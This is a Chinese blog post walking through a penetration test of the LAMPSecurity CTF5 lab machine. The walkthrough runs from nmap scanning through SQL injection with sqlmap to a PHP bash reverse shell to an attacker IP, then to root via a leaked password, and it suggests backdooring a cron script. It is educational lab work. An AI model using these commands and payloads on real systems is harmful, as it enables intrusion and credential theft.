LAMPSecurityCTF5渗透测试流程

已于 2023-07-14 18:45:53 修改
阅读量468 收藏
点赞数
文章标签: 安全 web安全
于 2023-07-13 00:20:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RemedyVI/article/details/131692626
版权
该文章描述了一次针对靶机的渗透测试过程,从信息收集开始,发现多个开放端口和CMS系统,利用SQL注入获取用户信息,通过反弹shell获得系统访问,并最终提权至root权限。过程中涉及了Web应用漏洞、数据库交互及Linux系统安全。
摘要由CSDN通过智能技术生成

靶机地址

https://www.vulnhub.com/entry/lampsecurity-ctf5

信息收集

主机探测

sudo nmap -sn 192.168.88.0/24

目标靶机IP地址192.168.88.140

初步扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.88.140

可以知道开启了以下端口

22 ssh 25 smtp 80 http

110 pop3 111 rpcbind 139 netbios-ssn

143 imap 445 microsoft-ds 901 samba-swat

3306 mysql 40138 unknow

详细信息扫描

sudo nmap -sT -sC -sV -O -p 22,25,80,110,111,139,143,445,901,3306 192.168.88.140

可以发现信息量很大,很多端口开放,还有很多目录。

漏洞脚本扫描

sudo nmap --script=vuln -p 22,25,80,110,111,139,143,445,901,3306 192.168.88.140

UDP扫描

sudo nmap -sU --top-ports 100 192.168.88.140

68/udp    open|filtered dhcpc

111/udp   open          rpcbind

631/udp   open|filtered ipp

5353/udp  open          zeroconf

32768/udp open          omad

目录扫描

sudo dirb http://192.168.88.140

sudogobusterdir -uhttp://192.168.88.140-w/usr/share/dirbuster/wordlists/directory-list-2.3-medi

um.txt  -x .txt,.php,.html,.jpg,.jpeg,.zip,.rar,.ini,.log

没扫全信息量太多

WEB指纹识别

发现NanoCMS

发现durpalCMS

php版本信息

信息总结

80端口可能有SQL注入,数据库为mysql版本大于5.0,可能获取user表信息登录cms后台或其余后台,php版本已知,可能有可利用漏洞,apache版本较老可能有漏洞,openssh版本较老可能有漏洞,操作系统为Linux。
猜测该靶机思路:SQL注入->获取后台账户密码->登录后台->利用漏洞获取反弹shell->提权

22  OpenSSH 4.7 25  Sendmail 8.14.1/8.14.1

80  Apache httpd 2.2.6  ((Fedora)) (可能存在SQL注入)

110  ipop3d 2006k.101 接收邮件

111  rpcbind 动态端口分配

139  Samba smbd 3.X - 4.X (workgroup: MYGROUP) windows和liunx文件打印和共享

143  University of Washington IMAP imapd 2006k.396 (time zone: -0400) 邮件访问

445  open  microsoft-ds Samba smbd 3.0.26a-6.fc8 (workgroup: MYGROUP)  共享文件

901  open  samba-swat SambaSWATadministrationserver          后台                          

3306/tcp open MySQL 5.0.45

OS:Linux

目录:

/info.php phpinfo()页面

/index.php 主页面

/mail 邮件后台登录

/list 注册 疑似存在SQL注入

/phpmyadmin/ 3.1.4.0

/squirrelmail/src/login.php: squirrelmail version 1.4.11-1.fc8  

/squirrelmail/images/sm_logo.png: SquirrelMail

/icons/: Potentially interesting folder w/ directory listing

/inc/: Potentially interesting folder

可能存在的漏洞

cve2017-1001000 存在的漏洞

SQL注入

漏洞寻找与利用

漏洞寻找

访问80端口主页面,发现一处疑似注册的地方。

发现是注册界面,可能存在SQL注入

尝试用输入’,发现存在注入点,并且暴露了表的字段。

使用' or 1=1 -- qwe,发现存在SQL注入。

漏洞利用 

使用sqlmap爆破数据库

sudo sqlmap -r sql --dbs --dump --batch
可以看到一共有三种注入方式,布尔盲注,时间盲注,报错注入

同时得到了一些用户
jennifer e3f4150c722e6376d87cd4d43fef0bc5

patrick password

andy newdrupalpass

loren lorenpass

amy temppass

尝试利用上述账户密码登录durpalCMS

发现用patrick password 成功登录,并且是管理员

反弹shell

发现可以执行php代码

成功获取反弹shell

kali:sudo nc -lvp 4444

php代码:<?php exec(/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/4444 0>&1'); ?>

权限提升

权限查看

查看权限和操作系统版本

发现是一个权限比较低的用户

可以查看/etc/passwd,不能查看/etc/shadow

敏感文件提权

尝试搜索密码

grep -R -i pass 2 /home/* 2>/dev/null|sort

发现疑似root密码的文件

发现疑似root密码50$cent

尝试切换用户到root

成功登录到root,提权成功。没有flag

计划任务提权?(可能) 

发现有4个root权限的计划任务

发现有一个所有人可读写执行的文件,可以echo “xxx”>>0logwatch写入反弹shell获取root用户权限,但是因为要每天凌晨4点才半执行,且不能更改系统时间我就没试了,理论上是可行的,只不过如果不是靶机的话很有可能直接被发现。

总结

本次渗透主要考察信息收集能力,大致流程为SQL注入获取后台密码,登陆后台利用命令执行PHP代码获取反弹shell,搜寻敏感文件获取root密码,然后切换到root提权成功。

Teardrop、
关注
CTF之LAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 939
  练习环境     攻击机:kali     靶机:LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
CTF7靶机渗透训练
weixin_44132032的博客
08-21 2809
CTF7靶机训练主机发现端口扫描查看服务器信息漏洞发现漏洞挖掘 ##环境下载 链接:https://pan.baidu.com/s/17IdF-74o278axL3Zj2V68A 提取码:kisb Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 此次训练其中一步为获取目标的账号密码,故目标环境无需登录。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp...
13、LAMP SecurityCTF5(VulnHub)
最新发布
carmi的博客
05-06 295
LAMP SecurityCTF5 一、nmap cat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ',' cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ',' > nmap_open_port_total.txt PORT STATE ...
Hack the LAMPSecurity: CTF 5 (CTF Challenge)
菜鸟耿耿
12-04 1619
Hack the LAMPSecurity: CTF 5 (CTF Challenge) 你好,朋友!今天,我们将面对另一个称为LAMPSecurity CTF5CTF挑战,这是为实践提供的另一个boot2root挑战,其安全级别适用于初学者。因此,让我们尝试突破它。但请注意,您可以先从这里下载 https://www.vulnhub.com/entry/lampsecurity-ctf5,84/ 下载完之后就开始我们今天的挑战啦~~ 实战演练 环境说明 kali IP:192.168.35.128 主机
网络端口介绍及漏洞分析
loaferwang的专栏
11-05 807
网络端口介绍及漏洞分析 分类:默认栏目2007.3.29 21:50 作者:bin1997kk | 评论:0 | 阅读:355 在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在smtp服务器的“25”端口。那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考。
红队打靶:LampSecurity:CTF5打靶思路详解(vulnhub)
Bossfrank的博客
06-20 1115
本文是vulnhub靶机LampSecurity:CTF5的打靶思路详解,涉及的知识点包括到关于NanoCMS凭据泄露漏洞利用、历史记录凭据搜索等。靶机不难,但在寻找cms后台登录和提权的过程需要经验。
CTF-5.SSH私钥泄露
woo233的博客
09-11 779
如何从外部进入最终root主机,取得flag。
LAMPSECURITY CTF6.pdf
12-26
## LAMPSECURITY: CTF6 - ### About Release ... - **Name**: LAMPSecurity: CTF6 - **Date release**: 29 Jun 2009 ...Please remember that VulnHub is a free community resource so we are unable to check the ...
靶机精讲之CTF5
m0_63285023的博客
04-11 199
sudo -l看权限 cat /etc/passwd查看用户目录(提权过程)searchsploit nanocms 搜索漏洞。试着切换root用户,试着拿到更好的shell。-R递归 -i忽略大小写 报错的扔掉。破解字典 -k保留。linux端破解MD5。搜索nanocms漏洞。password密码。
ctf5 vulnhub靶场
weixin_62621015的博客
03-03 133
ctf5 vulnhub靶场个人通关记录
LampSecurityCTF5
weixin_58815063的博客
09-04 94
mysql虽然分配了bash环境但利用的可能性不大。在最后发现了Patrick的note文件,用户也有bash环境,查看一下这个文件。有一个0.4版本的远程代码执行,但需要凭据才可以执行。2>/dev/null:因为当前用户权限不高,所以将错误信息扔掉。既然登陆成功,那之前的cms远程代码执行也可以利用。用户比较多的情况下,提权就要考虑能不能在本机上搜索到历史记录。利用一下本身存在的页面,尝试对内容进行修改。apache用户,权限很低,给的内容很有限。用户很多,但给了bash环境能利用的很少。
linux安全加固(2)
weixin_48190887的博客
07-22 266
弱口令检测John the Ripper 下载John the Ripper 用xfps软件把John the Ripper放到/opt目录下 然后tar解压 [root@localhost opt]# tar zxvf john-1.8.0.tar.gz 解压完查看一下john [root@localhost opt]# cd john-1.8.0/ [root@localhost john-1.8.0]# ll total 4 drwxr-xr-x. 2 root root 208 Jul 22 1..
渗透测试:主机发现和端口扫描的思路方法总结(nmap+ping命令+nc.traditional+伪设备连接)
Bossfrank的博客
06-20 7380
本文总结了有关主机发现和端口扫描的常规方法思路。包括使用nmap工具和使用ping命令进行主机发现、使用nc.traditional进行端口扫描、使用伪设备进行端口扫描。本文涉及了许多bash脚本的for循环命令、有关输出重定向>&符号的使用、逻辑运算符&&和||的使用等,希望读者慢慢消化。
Vulnhub靶机:LAMPSECURITY_ CTF5
LainWith的博客
12-23 1146
(此系列共5台)发布日期:2009年5月10日难度:初运行环境:VMware Workstation目标:取得 root 权限补充:解压下载得到的靶机,你会看到自带的一份官方攻略主机发现端口扫描+漏洞扫描敏感信息泄露cms挂马敏感信息提权。
应用安全 - 端口漏洞整理
weixin_30549175的博客
06-18 2893
21 FTP弱密码22 SSH弱密码23 telnet弱密码25 邮件伪造,vrfy/expn查询邮件用户信息,可使用smtp-user-enum工具来自动跑53 DNS溢出、远程代码执行、允许区域传送,dns劫持,缓存投毒,欺骗以及各种基于dns隧道的远控69 尝试下载目标及其的各类重要配置文件80 IIS6 RCE80-89 应用服务器端口 110 POP3 可尝试爆破,嗅探111 NFS ...
CTF练题(5)word隐写基础题,jpg图片隐写,敲击码解密
beyondlight6的博客
11-02 6151
对于此类题目,flag一般会藏在名为“word”的文件夹中,打开后显示几个xml格式文件,更多情况答案在“document.xml”中(大多数情况),打开即可获得答案。(1)图片拖入010Editor中分析,发现结尾有一段格式为rar的文件十六进制码,将这段十六进制码复制入新建十六进制文件中,以.rar的文件后缀保存到桌面中,打开获得一个txt文件。第一种为隐藏文字类型,获得一个可以打开的word文档后,在“选项”界面中点击“显示”,在显示出的界面勾选“隐藏文字”,点击确定,能观察到被出题人隐藏的字符。
ctf题库--FIVE1
miko2018的博客
08-21 2497
&amp;lt;题目&amp;gt; 图片内藏有5位数密码,你能找出来吗? 解题链接: http://ctf5.shiyanbar.com/stega/FIVE1/1111110000000000.jpg &amp;lt;解答&amp;gt; 根据链接可知这是一张图片、而且一定不是个简单的图片,让我们将文件下载下来。 ※打开发现是一个表情。接下来在Stegsolve中将该图片进行分析,列表中出现了一个格式为JPEG的文...
CTF】加密5——.!? + +[]- +奇怪的密码
weixin_44063560的博客
02-15 1952
.!? 同样也是Ook的特殊编码,转码即可得到flag。 ————————————————————————————————————————————— +[]- 这两道题都是老调重弹,本题Brainfuck转码即可得到flag。 ————————————————————————————————————————————— 奇怪的密码 乍看这道题,感觉毫无头绪,仔细思考发现第五个字符并不是常见字符...
CTF web总结
热门推荐
giantbranch的专栏
04-09 8万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
CTF 这个看起来有点简单
樱缘之梦
05-11 4276
这个看起来有点简单分值:10 来源: 西普学院难度:易 很明显。过年过节不送礼,送礼就送这个 格式: 解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1 解法: 1.手工注入   id=1' id=1 and 1=1 id=1 and 1=2                  
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值